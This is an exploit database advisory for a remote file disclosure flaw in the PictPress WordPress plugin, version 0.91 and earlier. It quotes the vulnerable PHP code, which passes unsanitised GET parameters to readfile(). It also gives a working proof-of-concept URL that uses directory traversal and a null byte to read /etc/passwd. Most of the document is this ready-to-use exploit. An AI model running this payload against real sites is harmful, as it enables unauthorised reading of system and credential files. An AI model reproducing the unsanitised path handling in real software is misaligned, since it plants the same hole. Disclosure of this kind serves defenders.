Wordpress Plugin PictPress <= 0.91 Remote File Disclosure Vulnerability

2007-12-05T00:00:00
ID 1337DAY-ID-2341
Type zdt
Reporter GoLd_M
Modified 2007-12-05T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================================
Wordpress Plugin PictPress <= 0.91 Remote File Disclosure Vulnerability
=======================================================================



Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
Vuln Code :
In Line 5,6,7,8 :
    $path = $_GET['path'];
    $size = $_GET['size'];
    $base = dirname(__FILE__) . "/..";
    $cache = "$base/cache/$size/$path";
In Line 22 :
    readfile($cache);
POC :
    /wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00



#  0day.today [2018-01-05]  #